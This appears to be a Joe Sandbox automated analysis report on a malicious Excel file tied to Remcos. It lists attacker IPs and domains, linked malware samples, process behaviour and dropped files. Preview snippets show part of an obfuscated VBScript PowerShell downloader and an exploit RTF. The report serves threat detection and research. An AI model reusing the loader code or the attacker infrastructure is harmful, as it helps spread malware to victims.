50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.241.153.192	z2.ink	United States	16509	AMAZON-02US	true
77.232.129.190	prolinice.ga	Russian Federation	42145	BSTV-ASRU	true
188.114.97.3	uploaddeimagens.com.br	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	paste.ee	European Union	13335	CLOUDFLARENETUS	true
198.46.177.156	unknown	United States	36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1448086
Start date and time:	2024-05-27 18:34:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#20240627_Edlen_A.xls
Detection:	MAL
Classification:	mal100.spre.bank.troj.spyw.expl.evad.winXLS@32/35@12/5
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 97% Number of executed functions: 144 Number of non-executed functions: 85
Cookbook Comments:	Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.93
Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
Execution Graph export aborted for target EQNEDT32.EXE, PID 3348 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 3520 because it is empty
Execution Graph export aborted for target rugtucw, PID 4036 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:36:07	Task Scheduler	Run new task: Firefox Default Browser Agent B5F9789926240BBC path: C:\Users\user\AppData\Roaming\rugtucw
12:35:22	API Interceptor	39x Sleep call for process: EQNEDT32.EXE modified
12:35:24	API Interceptor	67x Sleep call for process: wscript.exe modified
12:35:28	API Interceptor	274x Sleep call for process: powershell.exe modified
12:36:00	API Interceptor	1640x Sleep call for process: explorer.exe modified
12:36:07	API Interceptor	1x Sleep call for process: rugtucw modified
12:36:07	API Interceptor	179x Sleep call for process: taskeng.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54.241.153.192	HSBC Customer Information.xls	Get hash	malicious	Unknown	Browse	z2.ink/pWJE
	HSBC Customer Information.xls	Get hash	malicious	Unknown	Browse	z2.ink/pWJE
	HSBC Customer Information.xls	Get hash	malicious	Unknown	Browse	z2.ink/pWJE
	Ref19920830281982938RT.xls	Get hash	malicious	Remcos	Browse	z2.ink/nLNG
	swift.xls	Get hash	malicious	Unknown	Browse	z2.ink/wxMX
	swift.xls	Get hash	malicious	Unknown	Browse	z2.ink/wxMX
	swift.xls	Get hash	malicious	Unknown	Browse	z2.ink/wxMX
	LHER0006981753.xls	Get hash	malicious	Remcos	Browse	z2.ink/n7QN
	Ref_FTD431100.xls	Get hash	malicious	Remcos	Browse	z2.ink/
188.114.97.3	http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico	Get hash	malicious	HTMLPhisher	Browse	worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico
	http://www.lnkfi.re/1moJNQoc/	Get hash	malicious	Unknown	Browse	cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral
	http://twomancake.com	Get hash	malicious	Unknown	Browse	twomancake.com/
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	fleur-de-lis.sbs/jhgfd
	Purchase Order # PO-00159.xla.xlsx	Get hash	malicious	Unknown	Browse	qr-in.com/YXcuqXy
	LHER000698175.xls	Get hash	malicious	Unknown	Browse	qr-in.com/JeYCrvM
	PO 4500025813.xls	Get hash	malicious	Unknown	Browse	qr-in.com/RtWEZGi
	SCB REmittance Advice.doc	Get hash	malicious	Lokibot	Browse	rocheholding.top/evie3/five/fre.php
	WRnJsnI1Zq.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	objectiveci.top/pythonpacketGamebigloadprivateCentral.php
	http://hjkie5.pages.dev/	Get hash	malicious	Unknown	Browse	hjkie5.pages.dev/
188.114.96.3	Curriculum Vitae Catalina Munoz.exe	Get hash	malicious	FormBook	Browse	www.uqdr.cn/yfa0/
	http://y6ss1.shop/	Get hash	malicious	Unknown	Browse	y6ss1.shop/l/gaz/videos/gaz-platform-preview.mp4
	http://newclaim-dannx-creat.promodaget.my.id/	Get hash	malicious	Unknown	Browse	newclaim-dannx-creat.promodaget.my.id/
	http://worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.ico	Get hash	malicious	HTMLPhisher	Browse	worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.ico
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	fleur-de-lis.sbs/jhgfd
	KT-L068310.exe	Get hash	malicious	FormBook	Browse	www.barrettdigitalart.com/i319/
	http://cfg3xe.pages.dev/	Get hash	malicious	Unknown	Browse	cfg3xe.pages.dev/
	http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/	Get hash	malicious	Unknown	Browse	amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/
	G5N0mtxJLN.exe	Get hash	malicious	Lokibot	Browse	rocheholding.top/evie3/five/fre.php
	Purchase Order # PO-00159.xla.xlsx	Get hash	malicious	Unknown	Browse	qr-in.com/YXcuqXy

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
z2.ink	HSBC Customer Information.xls	Get hash	malicious	Unknown	Browse	54.241.153.192
	HSBC Customer Information.xls	Get hash	malicious	Unknown	Browse	54.241.153.192
	HSBC Customer Information.xls	Get hash	malicious	Unknown	Browse	54.241.153.192
	Ref19920830281982938RT.xls	Get hash	malicious	Remcos	Browse	54.241.153.192
	swift.xls	Get hash	malicious	Unknown	Browse	54.241.153.192
	swift.xls	Get hash	malicious	Unknown	Browse	54.241.153.192
	swift.xls	Get hash	malicious	Unknown	Browse	54.241.153.192
	LHER0006981753.xls	Get hash	malicious	Remcos	Browse	54.241.153.192
	Ref_FTD431100.xls	Get hash	malicious	Remcos	Browse	54.241.153.192
paste.ee	kam.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	las.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	upload.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3
	Ref19920830281982938RT.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	LHER0006981753.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	Ref_FTD431100.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	upload.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3
	update.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	windows.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3
uploaddeimagens.com.br	kam.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	las.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3
	upload.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3
	Ref19920830281982938RT.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	LHER0006981753.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	Ref_FTD431100.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	upload.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	update.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3
	windows.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BSTV-ASRU	RkdXl7E3rG.exe	Get hash	malicious	AsyncRAT	Browse	77.232.132.25
	nMbRell419.exe	Get hash	malicious	AsyncRAT, GMiner, Quasar	Browse	77.232.132.25
	2ctyhHi7vb.exe	Get hash	malicious	AsyncRAT, GMiner, Quasar	Browse	77.232.132.25
	jOR8nr6mAC.exe	Get hash	malicious	Quasar	Browse	77.232.132.25
	kPl1mZTpru.exe	Get hash	malicious	Tofsee	Browse	77.232.138.239
	mtxfh5xJDf.exe	Get hash	malicious	Quasar	Browse	77.232.132.25
	file.exe	Get hash	malicious	Tofsee	Browse	77.232.132.142
	BMTxyapegR.exe	Get hash	malicious	AsyncRAT	Browse	77.232.132.25
	q05RiWoYOi	Get hash	malicious	Mirai	Browse	77.232.157.125
	OKkz1EHZvq	Get hash	malicious	Mirai	Browse	77.232.157.103
CLOUDFLARENETUS	Shipping Documents inv. 523435300XX.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	https://www.acm.gov.pt/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html?p=insta&Connector=https://a.top1cheat.com/kJIVLY5E	Get hash	malicious	Unknown	Browse	172.67.184.156
	hXXps://www.acm.gov.pt/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html?p=insta&Connector=https://a.top1cheat.com/kJIVLY5E	Get hash	malicious	Unknown	Browse	172.67.184.156
	https://shorter.gg/dUUJUv	Get hash	malicious	Phisher	Browse	104.21.74.233
	Doc_10577030xls.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://stikeman-vpn.azureedge.net/?value=odWPPcO	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://link.elliottscotthr.com/api/redirect.me?track=000000&url=https%3A%2F%2Fwww.atjehupdate.com/3tvdgh	Get hash	malicious	Unknown	Browse	104.17.2.184
	xvJv1BpknZ.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	188.114.96.3
	kam.vbs	Get hash	malicious	Unknown	Browse	162.159.134.233
	las.vbs	Get hash	malicious	Unknown	Browse	162.159.134.233
AMAZON-02US	https://psowapt.weebly.com	Get hash	malicious	HTMLPhisher	Browse	44.239.61.97
	http://isme-zcmp.campaign-view.eu	Get hash	malicious	Unknown	Browse	108.156.60.76
	https://clt1522206.benchurl.com	Get hash	malicious	Unknown	Browse	54.70.163.223
	https://drive.google.com/uc?export=download&id=12v1VZUwGaH9dJNC24k24Rn9zAkDKRnBD	Get hash	malicious	Unknown	Browse	3.77.81.157
	angeh#U00e4ngter Ordner.docx	Get hash	malicious	Unknown	Browse	185.166.143.36
	angeh#U00e4ngter Ordner.docx	Get hash	malicious	Unknown	Browse	54.230.202.57
	USD46k Swift_PDF.exe	Get hash	malicious	FormBook	Browse	76.223.67.189
	nzKl7TpAyk.elf	Get hash	malicious	Unknown	Browse	18.219.243.207
	hZ80PhOmKK.elf	Get hash	malicious	Unknown	Browse	54.108.134.137
	C4zDQjrSzj.elf	Get hash	malicious	Unknown	Browse	34.240.188.207
CLOUDFLARENETUS	Shipping Documents inv. 523435300XX.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	https://www.acm.gov.pt/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html?p=insta&Connector=https://a.top1cheat.com/kJIVLY5E	Get hash	malicious	Unknown	Browse	172.67.184.156
	hXXps://www.acm.gov.pt/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html?p=insta&Connector=https://a.top1cheat.com/kJIVLY5E	Get hash	malicious	Unknown	Browse	172.67.184.156
	https://shorter.gg/dUUJUv	Get hash	malicious	Phisher	Browse	104.21.74.233
	Doc_10577030xls.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://stikeman-vpn.azureedge.net/?value=odWPPcO	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://link.elliottscotthr.com/api/redirect.me?track=000000&url=https%3A%2F%2Fwww.atjehupdate.com/3tvdgh	Get hash	malicious	Unknown	Browse	104.17.2.184
	xvJv1BpknZ.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	188.114.96.3
	kam.vbs	Get hash	malicious	Unknown	Browse	162.159.134.233
	las.vbs	Get hash	malicious	Unknown	Browse	162.159.134.233

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Ref19920830281982938RT.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	37SD8SH18I.docm	Get hash	malicious	Unknown	Browse	188.114.97.3
	LHER0006981753.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	Ref_FTD431100.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	Offer 15492024 15602024.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.3
	Home Purchase Contract and Property Details.xls	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.97.3
	1080.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Sipari#U015f detaylar#U0131.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Drwg.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pepsico RFQ_P1005712.xls	Get hash	malicious	GuLoader	Browse	188.114.97.3
7dcce5b76c8b17472d024758970a406b	Ref19920830281982938RT.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	LHER0006981753.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	Ref_FTD431100.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	documentos.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	Items.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	Items.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	ArOuryf0GL.rtf	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	Offer 15492024 15602024.docx.doc	Get hash	malicious	Unknown	Browse	188.114.96.3
	SCB REmittance Advice.doc	Get hash	malicious	Lokibot	Browse	188.114.96.3
	948209184.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\rugtucw	Requirements.xla.xlsx	Get hash	malicious	AveMaria, UACMe	Browse
	vns.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse
	Doc606112.xls	Get hash	malicious	AgentTesla	Browse
	SWIFT26794306.xlam.xlsx	Get hash	malicious	AgentTesla, zgRAT	Browse
	Enquiry#234342.xlam.xlsx	Get hash	malicious	AgentTesla, zgRAT	Browse
	Profoma.xls	Get hash	malicious	AgentTesla	Browse
	Scan_doc000680092112202023130.xlam.xlsx	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.RansomX-gen.23647.22068.exe	Get hash	malicious	AgentTesla	Browse
	e-Profile.js	Get hash	malicious	AgentTesla	Browse
	Orden_581278118.xlam.xlsx	Get hash	malicious	Nanocore	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025246492481374738
Encrypted:	false
SSDEEP:	6:I3DPcfy/7u1HvxggLR5kS1AZoFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPjuRf/vYg3J/
MD5:	C15C83C5778720A2D10B25F1C6201622
SHA1:	01DEED5673CFF4E446E8D88EEB46AFE8620688C2
SHA-256:	4C66CD17E00341199BCF6E5164D37069C18ED3FAE49EB46AB1C12B61B9C3D526
SHA-512:	35CE37315234C755CDD9891D463C95DDCF825E351BAFEF0F0F7B67C918A54C14B474D303BFA58C50DF6ED69608448D0E517AD4980752577E20A264DF9EC20333
Malicious:	false
Preview:	......M.eFy...z.^.9..EE....._,S,...X.F...Fa.q............................G.]z).YK.6O...............8.i+]C....#9.y.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4760
Entropy (8bit):	4.834060479684549
Encrypted:	false
SSDEEP:	96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
MD5:	838C1F472806CF4BA2A9EC49C27C2847
SHA1:	D1C63579585C4740956B099697C74AD3E7C89751
SHA-256:	40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
SHA-512:	E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
Malicious:	false
Preview:	PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Bo3r4[1].txt

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	ASCII text, with very long lines (11472), with CRLF line terminators
Category:	dropped
Size (bytes):	13831
Entropy (8bit):	4.589493012801081
Encrypted:	false
SSDEEP:	384:xFcXR9Vw42L2rVXwsL0d+m8uGDye3j/pSH+K+Ro/VpPgR9VNVb7mKVW:0VhEYVXz0gXuGue3j/pZJuViDPmKVW
MD5:	A24C979AFEC9E3D77453DBAFA2752713
SHA1:	C16882A43FD1E994E1790C7CC1B98AE9A6841FDB
SHA-256:	72B94D64C4A77D67B8DEF0F39A44CA39F49C3266EE2498F0C5668B2FC195EBE3
SHA-512:	21E12605ACCDFAE174FB50D86A2D716E8AD09EEA893F83AD2113E9B1461E15199D30B8CFBE921AEEC01A85436C6918235CADF730D9F96F95E464E31301F44C8F
Malicious:	false
Preview:	.. dim periodicamente , regulador , desvirginizar , passarinha , mustelino , Cama , mustelino1.. regulador = " ".. desvirginizar = "" & passarinha & regulador & passarinha & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & passarinha & regulador & passarinha & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & passarinha & regulador & passarinha & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & passarinha & regulador & passarinha & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & passarinha & regulador & passarinha & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & passarinha & regulador & passarinha & "QBuDgTreH

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ISO-8859 text, with very long lines (1707), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	28906
Entropy (8bit):	3.097021912670486
Encrypted:	false
SSDEEP:	768:RqCYhRWIXXXd4r+ZCniBMjHtL6KPIfDarDY8:RGRWkd4YCiKjxjPIbar88
MD5:	F086617AD5F31052493192AF152C2FDF
SHA1:	2E1B7041E9F9A3BCC8300BCD15956C4CBE1B3A72
SHA-256:	E69569FFB1BDBF9185CB732BFA897EFDA4E62BA095D519EF3316BBDEBD6D9B9E
SHA-512:	F30E011A09DCBD744C67FC56676A5660A016DAFE1A1525FE91A12E11B360F741FB6EDE434EDDEC0487DAAA9A099ED9AC52095895C552C3E12AD74B535FBB9DEB
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rt.........{\\fontinfo250569160 \"}.{\398519213&]/3..`+56??^?2)4/_~6!,?_&1/&6]=..9:3]8/\|.<`&.:#(.41._+7%352\|1)4?4^_@.<~..`%@2/%?4+&6%9..??~2:?0?!33.$0`!88]?30.!??<[?%$($<?3,?/.%!/425?0%)9-%@/11~??60%148.-9$?#?4.^0-6]72?9@317$\|[3-):3?`57..!.&<-..8/@15]_\|-+.88?3$?;5?/-,0)`,.+@1!!<&&3%((21~6%:7?-??(.#!.5_$./$&$).>~%(+;?(\|./`'0)6~`'%3`.,%#==.'[?.!?50:%$,\|$.=&`??%..8)532%9^~^?#?64:3\|-.^%#71...7$?_??@)9?=181$.<;$/7,?-%28]=.~0408!][/8?22)[?;)\|-).1_+4.@`(+?+#>=]:.%4+0!!$6;?3)1+?&)2)2][.#:13?<1?0$?+79/%.8''~.1!>@-\|^.&3':??~?0?).9@1#.&(~68(@05;;:4~?^@#)'5][)#,6./'@[\|6.)!%,_>:@..~%,$`?%\|(.2@3:%414^%^./#>!.%`$&_:9!#+;?',63'?`&?-.:>_<?+='?2=59:[%0...?\|[/.47?+,(%`).1.9.97'),_@?_%_$/?+>,]7]+=7/.?#:[.07;1^2]2[.46#.%;8?0`?/??(,?]7]?\|6<;%;<-~].&.$%0')^+.;24[+.[;53/@8_?\|?5_?4%_).92~@-3,'!.9).57?>-^@1+5<][6<.!&.22?2_16/1\|>^;%;%@8.#&:4??(25(?5)!'7%?75;=-//(3?&)6_1'[)3^;.~$>93!+.-!?'17?_/*?8..1???(%+??\|><,81@61<~!?./']~^7485>$().-?<4^..)3:.2..)&48/)?>;.,!)7''?.']6.94;+!-??9$(.9?.\|.11

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lionarekingofjungleimageshere[1].bmp

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	158312
Entropy (8bit):	3.2731864151473893
Encrypted:	false
SSDEEP:	1536:Igwd99COby6Cyc12taJK6d9gjh8W0/5JpXe1cNUg0B0bUZlu9gISsR5:XwdPUJK6L/Kcig0B0ci
MD5:	5CFD67486E857744CCC14E2DEF9FF318
SHA1:	4049E46FE68A2B97F3F6C7170A7FB859D097F88E
SHA-256:	D14DB1AEC62AA5C55D3E507CF9502A6D2E26C9F1C3FB55FE9649FF8576AF02B3
SHA-512:	6EC2A3C304A84468A2FF4CD26A4B74C05FA212794A5E7BDCFB538A35CBD560075541097450689833841CFC5D01020C1AB762F20D855E416033CCFFAF7E62E6EF
Malicious:	false
Preview:	......F.u.n.c.t.i.o.n. .W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e.(.d.t.m.E.v.e.n.t.D.a.t.e.).........W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e. .=. .C.D.a.t.e.(.M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .5.,. .2.). .&. ."./.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .7.,. .2.). .&. ."./.". .&. .L.e.f.t.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .4.). ._.....&. .". .". .&. .M.i.d. .(.d.t.m.E.v.e.n.t.D.a.t.e.,. .9.,. .2.). .&. .".:.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .1.1.,. .2.). .&. .".:.". .&. .M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. ._.....1.3.,. .2.).).........E.n.d. .F.u.n.c.t.i.o.n.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....F.u.n.c.t.i.o.n. .g.e.t.D.e.s.c.r.i.p.t.i.o.n.(.s.t.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ISO-8859 text, with very long lines (1707), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	28906
Entropy (8bit):	3.097021912670486
Encrypted:	false
SSDEEP:	768:RqCYhRWIXXXd4r+ZCniBMjHtL6KPIfDarDY8:RGRWkd4YCiKjxjPIbar88
MD5:	F086617AD5F31052493192AF152C2FDF
SHA1:	2E1B7041E9F9A3BCC8300BCD15956C4CBE1B3A72
SHA-256:	E69569FFB1BDBF9185CB732BFA897EFDA4E62BA095D519EF3316BBDEBD6D9B9E
SHA-512:	F30E011A09DCBD744C67FC56676A5660A016DAFE1A1525FE91A12E11B360F741FB6EDE434EDDEC0487DAAA9A099ED9AC52095895C552C3E12AD74B535FBB9DEB
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
